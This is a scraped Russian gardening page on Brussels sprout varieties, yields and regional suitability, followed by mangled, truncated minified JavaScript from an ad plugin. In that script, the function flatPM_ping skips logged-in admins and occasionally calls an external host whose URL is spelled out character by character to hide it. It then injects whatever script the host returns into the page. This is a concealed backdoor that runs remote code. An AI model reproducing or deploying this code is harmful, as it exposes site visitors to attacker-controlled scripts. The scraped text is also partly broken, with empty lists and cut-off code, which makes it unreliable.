Это самый ранний голландский гибрид! Кочанчики плотные, темно-зеленые, созревают за 85-90 дней. На одном растении может вызреть до 70 штук. Рекомендован к использованию в свежем виде и кулинарии. Для хранения не подлежит.

Лонг Айленд

Формирует полу-карликовый куст, высотой до 80 см, с мелкими кочанчиками. На одном растении их вырастает до 40 шт. К уборке урожая приступают через 85 дней, выборочно срезая созревшие кочаны.

Розелла F1

Старый гибрид немецкой селекции, известный своим дружным созреванием через 160 дней. Стебель растения высокий, темно-зеленый, покрытый темно-зелеными пузырчатыми листьями с слабым восковым налетом. Формирует кочанчики узкообратнояйцевидной формы, слегка удлиненные, массой 13 г и диаметром 2-3 см. Растения неприхотливы в уходе и устойчивы к большинству болезней капустных.

Руднеф

На стебле через 90-100 дней созревают мелкие кочанчики, диаметром 1-2 см. Особую ценность культуры представляет ее морозоустойчивость (до -7°C ), возможность выращивания в Нечерноземной зоне и способность к длительной сохранности кочанов на стебле.

Абакус F1

Срок от всходов до сбора овоща составляет 110-115 дней. Стебель и листья растения зеленые. Кочан – 2-3 см в диаметре, зеленый. Не боится холодов, влаголюбива, отличается высокой устойчивостью к стрессам и неблагоприятным факторам.

Какие наиболее урожайные?

  • Диаболо (3,9 кг с м 2 ).
  • Бриллиант (3 кг/м 2 ).
  • Франклин F1 (2,8 кг с кв.м.).
  • Долмик F1 (по 2,5 кг с м 2 ).
  • Завитка (2,4 кг с кв.м.).

Какие из сортов лучше выращивать?

На юге

Рекомендованы к выращиванию как ранние, так и поздние сорта. Продолжительное жаркое лето и мягкая осень позволяет держать урожай поздних капуст до Нового года на кусте, например:

В средней полосе

Необходимо подбирать сорта с коротким сроком созревания и не боящихся отрицательных температур:

В Сибири

Хорошо себя зарекомендовали раннеспелые и среднеранние сорта с хорошей отдачей урожая:
  • Долмик F1;
  • Зимушка;
  • Боксер F1;
  • Руднеф;
  • Гранатовый браслет.

На Урале

Наилучшими будут ранние сорта, устойчивые к грибковым болезням:

В условиях климата средней полосы и северных регионов России выращивание брюссельской капусты возможно только рассадным способом.

Большинство сортов брюссельской капусты неприхотливы в уходе и могут повсеместно выращиваться. В зависимости от региона, капусту сажают прямо в грунт в конце апреля-начале мая или выращивают через рассаду. При покупке семян желательно обратить внимание на новинки с пометкой F1, которые в отличие от старых сортов имеют более полный набор преимуществ.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};